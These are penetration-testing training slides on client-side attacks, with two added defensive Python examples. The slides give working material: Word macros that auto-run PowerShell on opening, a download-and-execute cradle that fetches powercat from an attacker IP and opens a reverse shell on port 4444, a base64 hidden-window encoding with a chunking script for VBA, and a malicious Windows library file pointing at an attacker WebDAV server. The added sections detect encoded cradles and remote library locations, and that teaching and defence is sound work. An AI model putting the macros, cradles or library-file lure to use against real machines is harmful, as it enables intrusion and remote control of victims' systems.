Client-Side Attack Techniques Guide

The document discusses various client-side attack techniques, including exploiting Microsoft Office applications using macros to execute malicious code, abusing Windows library files to gain an initial foothold, and using PowerShell to download payloads and establish a reverse shell connection back to the attacker. It provides code examples of using macros in Word and Excel to run PowerShell, splitting a base64 encoded string into chunks for use in a macro, and creating a Windows library file linked to a WebDAV server to deliver a second stage payload.

Penetration Testing

Client-side Attacks
[Figure: MITRE ATT&CK heat map highlighting the top five techniques CrowdStrike observed adversaries use in each tactic area, June 2022 to July 2023]


Client-side Attacks

● Once the target user executes the files we deliver on their machine, we can get a foothold in the internal network.
● Client-side attacks often exploit weaknesses or functions in local software and applications such as browsers, operating system components, or office programs.
● To execute malicious code on the client's system, we must often persuade, trick, or deceive the target user.
Target Reconnaissance

● Target’s installed software
● OS
● Personal information
● Device fingerprinting (Grabify, Canarytokens, …)
Exploiting Microsoft Office

● Microsoft Office applications like Word and Excel allow users to embed macros
● Macros are one of the oldest and best-known client-side attack vectors
Exploiting Microsoft Office

Macro opening powershell.exe:

Sub Test_Macro()
    CreateObject("Wscript.Shell").Run "powershell"
End Sub
Exploiting Microsoft Office
' Both entry points run when the document is opened, so the payload
' procedure is reached whichever one Word fires.
Sub AutoOpen()
    Test_Macro
End Sub

Sub Document_Open()
    Test_Macro
End Sub

Sub Test_Macro()
    CreateObject("Wscript.Shell").Run "powershell"
End Sub
Exploiting Microsoft Office
Sub Test_Macro()
    Dim Str As String
    ' Str holds the complete powershell.exe command line, assembled from chunks
    CreateObject("Wscript.Shell").Run Str
End Sub

Use powercat to create a reverse shell:

cp /usr/share/powershellempire/empire/server/data/module_source/management/powercat.ps1 .

IEX (New-Object System.Net.WebClient).DownloadString("http://192.168.45.229/powercat.ps1");powercat -c 192.168.45.229 -p 4444 -e powershell
Exploiting Microsoft Office
$Text = 'IEX (New-Object System.Net.WebClient).DownloadString("http://192.168.45.229/powercat.ps1");powercat -c 192.168.45.229 -p 4444 -e powershell'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText = [Convert]::ToBase64String($Bytes)
$EncodedText

powershell.exe -nop -w hidden -enc <paste the $EncodedText output here>


Exploiting Microsoft Office
Python script to split the encoded command line into 50-character chunks and print the VBA statements that concatenate them into the Str variable:

command = "powershell.exe -nop -w hidden -e SQBFAFgAKABOAGUAdwA..."
n = 50

for i in range(0, len(command), n):
    print("Str = Str + " + '"' + command[i:i+n] + '"')
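Added example, not part of the original slides: a defender-side triage helper in Python that recovers the cleartext behind the -enc argument the macro hands to powershell.exe (EncodedCommand is Base64 over UTF-16LE) and flags the download-cradle markers used in this section. The command lines it runs over are constructed samples, not real telemetry.

```python
import base64
import binascii

# Substrings that, in a decoded command, mark a download-and-execute cradle.
CRADLE_INDICATORS = (
    "IEX", "Invoke-Expression", "DownloadString", "DownloadFile",
    "Net.WebClient", "Invoke-WebRequest", "powercat",
)

def _matches_param(token: str, full_name: str) -> bool:
    """PowerShell accepts any prefix of a parameter name (-e, -enc, -EncodedCommand)."""
    return token.startswith("-") and len(token) > 1 and full_name.startswith(token[1:].lower())

def decode_encoded_command(cmdline: str):
    """Return the cleartext behind -EncodedCommand (Base64 of UTF-16LE), or None."""
    tokens = cmdline.split()
    for flag, value in zip(tokens, tokens[1:]):
        if _matches_param(flag, "encodedcommand") or flag.lower() == "-ec":
            try:
                return base64.b64decode(value, validate=True).decode("utf-16-le")
            except (binascii.Error, UnicodeDecodeError):
                return None
    return None

def triage(cmdline: str) -> dict:
    """Summarise one command line: decoded payload, hidden window, cradle indicators."""
    tokens = cmdline.split()
    decoded = decode_encoded_command(cmdline)
    hidden = any(_matches_param(f, "windowstyle") and v.lower() == "hidden"
                 for f, v in zip(tokens, tokens[1:]))
    haystack = (decoded or cmdline).lower()
    found = [ind for ind in CRADLE_INDICATORS if ind.lower() in haystack]
    return {"decoded": decoded, "hidden_window": hidden, "indicators": found}

# Constructed sample log lines, not real telemetry. The first carries the slides'
# powercat cradle encoded the way -enc expects; the second is a benign script run.
_CRADLE = ('IEX (New-Object System.Net.WebClient).DownloadString('
           '"http://192.168.45.229/powercat.ps1");powercat -c 192.168.45.229 -p 4444 -e powershell')
SAMPLE_COMMAND_LINES = [
    "powershell.exe -nop -w hidden -enc "
    + base64.b64encode(_CRADLE.encode("utf-16-le")).decode("ascii"),
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
]

if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        print(triage(line))
```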


Abusing Windows Library Files

● Windows library files are virtual containers for user content. They connect users with data stored in remote locations like web services or shares
● Two-stage client-side attack
    ○ Use Windows library files to gain a foothold on the target system and set up the second stage
    ○ Use the foothold to provide an executable file that will start a reverse shell when double-clicked.
The first stage
● Create a Windows library file connecting to a WebDAV share server
● Install and run the WebDAV server:
    apt install python3-wsgidav
    wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/webdav/
● Create the file and test.
The first stage
● Create Windows Library file

XML and library description version:

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
</libraryDescription>

Name and version tags of the library:

<name>@windows.storage.dll,-34582</name>
<version>6</version>
The first stage
Configuration for navigation bar pinning and icon:

<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>

templateInfo and folderType tags:

<templateInfo>
    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
The first stage
searchConnectorDescriptionList and simpleLocation tags (the URL points at the WebDAV server):

<searchConnectorDescriptionList>
    <searchConnectorDescription>
        <isDefaultSaveLocation>true</isDefaultSaveLocation>
        <isSupported>false</isSupported>
        <simpleLocation>
            <url>http://192.168.211.129</url>
        </simpleLocation>
    </searchConnectorDescription>
</searchConnectorDescriptionList>
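Added example, not part of the original slides: a Python check that parses a .library-ms file like the one assembled above and reports every search-connector location served by a remote host, which is what distinguishes this first-stage file from a normal library on disk. Both sample files are constructed here: the first from the fragments shown on the slides, the second with the remote URL swapped for a local known folder.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

NS = {"lib": "http://schemas.microsoft.com/windows/2009/library"}

def remote_locations(library_xml: str) -> list:
    """Return (url, is_default_save_location) for each connector served by a remote host."""
    root = ET.fromstring(library_xml.encode("utf-8"))
    findings = []
    path = "lib:searchConnectorDescriptionList/lib:searchConnectorDescription"
    for desc in root.findall(path, NS):
        url = desc.findtext("lib:simpleLocation/lib:url", default="", namespaces=NS).strip()
        if not url:
            continue
        scheme = urlparse(url).scheme.lower()
        # Local libraries use knownfolder:{GUID} or drive paths; http(s) or a UNC path
        # means Explorer contacts another host as soon as the library is opened.
        if scheme in ("http", "https") or url.startswith("\\\\"):
            default_save = desc.findtext("lib:isDefaultSaveLocation", default="false", namespaces=NS)
            findings.append((url, default_save.strip().lower() == "true"))
    return findings

# Constructed samples. The first reassembles the fragments shown on the slides; the
# second swaps the remote URL for the Documents known folder a normal library uses.
SUSPICIOUS_LIBRARY = """<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@windows.storage.dll,-34582</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <templateInfo>
    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <url>http://192.168.211.129</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""
BENIGN_LIBRARY = SUSPICIOUS_LIBRARY.replace(
    "http://192.168.211.129", "knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}")

if __name__ == "__main__":
    print(remote_locations(SUSPICIOUS_LIBRARY), remote_locations(BENIGN_LIBRARY))
```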
The second stage
PowerShell download and powercat reverse shell:

powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.3:8000/powercat.ps1'); powercat -c 192.168.211.129 -p 4444 -e powershell"
Use-case: APT targets Vietnam government
